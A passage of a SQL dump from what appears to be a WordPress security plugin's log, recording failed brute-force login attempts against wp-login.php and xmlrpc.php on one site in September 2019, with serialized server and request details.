empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.188.30.116\";s:11:\"REMOTE_PORT\";s:5:\"52868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxj4VvRyrCg9V6axS2xXAAAAVA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567384545.2974\";s:12:\"REQUEST_TIME\";s:10:\"1567384545\";}}','notice','2019-09-02 00:35:46','2019-09-02 00:35:45',18206240,19505864,'https://bintara.com.my/xmlrpc.php',1,0,'59.188.30.116'),(23502,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.245.49.191\";s:11:\"REMOTE_PORT\";s:5:\"53916\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWw-St9YzdT54U4Mrp8U9wAAAYY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567375178.9482\";s:12:\"REQUEST_TIME\";s:10:\"1567375178\";}}','notice','2019-09-01 21:59:40','2019-09-01 21:59:39',17852976,19177632,'https://bintara.com.my/wp-login.php',1,0,'198.245.49.191'),(23503,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.245.49.191\";s:11:\"REMOTE_PORT\";s:5:\"54380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWw-Td9YzdT54U4Mrp8U@AAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567375182.0339\";s:12:\"REQUEST_TIME\";s:10:\"1567375182\";}}','notice','2019-09-01 21:59:43','2019-09-01 21:59:42',18202048,19499160,'https://bintara.com.my/xmlrpc.php',1,0,'198.245.49.191'),(23504,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.196.64\";s:11:\"REMOTE_PORT\";s:5:\"49116\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxC9Gje8g9YegPUhtOQHgAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567376116.2612\";s:12:\"REQUEST_TIME\";s:10:\"1567376116\";}}','notice','2019-09-01 22:15:17','2019-09-01 22:15:16',17687248,19177784,'https://bintara.com.my/wp-login.php',1,0,'103.6.196.64'),(23505,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.196.64\";s:11:\"REMOTE_PORT\";s:5:\"49428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxC9t9YzdT54U4Mrp8WfwAAAZA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567376118.5213\";s:12:\"REQUEST_TIME\";s:10:\"1567376118\";}}','notice','2019-09-01 22:15:19','2019-09-01 22:15:18',18202880,19501152,'https://bintara.com.my/xmlrpc.php',1,0,'103.6.196.64'),(23506,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.250.110\";s:11:\"REMOTE_PORT\";s:5:\"36384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxGmFvRyrCg9V6axS2sygAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567377048.4865\";s:12:\"REQUEST_TIME\";s:10:\"1567377048\";}}','notice','2019-09-01 22:30:49','2019-09-01 22:30:48',17691704,19176880,'https://bintara.com.my/wp-login.php',1,0,'45.252.250.110'),(23507,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.250.110\";s:11:\"REMOTE_PORT\";s:5:\"36384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxGmFvRyrCg9V6axS2sygAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567377048.4865\";s:12:\"REQUEST_TIME\";s:10:\"1567377048\";}}','notice','2019-09-01 22:30:50','2019-09-01 22:30:48',17853304,19176880,'https://bintara.com.my/wp-login.php',1,0,'45.252.250.110'),(23508,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.250.110\";s:11:\"REMOTE_PORT\";s:5:\"36684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxGmt9YzdT54U4Mrp8YHgAAAZA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567377050.8194\";s:12:\"REQUEST_TIME\";s:10:\"1567377050\";}}','notice','2019-09-01 22:30:52','2019-09-01 22:30:51',18202536,19500184,'https://bintara.com.my/xmlrpc.php',1,0,'45.252.250.110'),(23509,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"31251\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxKB99YzdT54U4Mrp8ZXwAAAZI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567377927.1174\";s:12:\"REQUEST_TIME\";s:10:\"1567377927\";}}','notice','2019-09-01 22:45:28','2019-09-01 22:45:27',17688080,19177024,'https://bintara.com.my/wp-login.php',1,0,'157.230.55.177'),(23510,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 